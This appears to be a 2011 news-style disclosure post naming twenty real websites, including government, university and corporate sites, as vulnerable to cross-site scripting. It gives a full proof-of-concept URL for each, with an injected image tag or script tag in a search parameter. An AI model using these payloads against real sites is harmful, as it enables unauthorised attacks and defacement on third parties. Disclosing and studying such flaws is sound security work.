Most of the biggest and Famous sites are found to be Vulnerable to XSS attack . Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued. Hacker with code name "*Invectus*" list some such famous sites with XSS vulnerability as listed below : *1.)* http://video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D *2.)* http://www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *3.)* http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false *4.) * http://www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit *5.) * http://thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *6.)* http://www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *7.)* http://www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *8.)* http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *9.)* http://www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E *10.)* http://www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *11.)* http://www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E *12.)* http://www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu *13.) * http://cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *14.)* http://ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13 *15.)* http://vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E *16.)* http://google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6 *17.)* http://ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E *18.)* http://www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=http://www.uidaho.edu/search?xml=1&ticks=634508915004972966 *19.)* https://vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E *20.)* http://energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E Original Post ; : The Hacker News ~ http://thehackernews.com/2011/09/20-famous-websites-vulnerable-to-cross.html -- *Regards,* *Owner,* *The Hacker News * *Truth is the most Powerful weapon against Injustice.*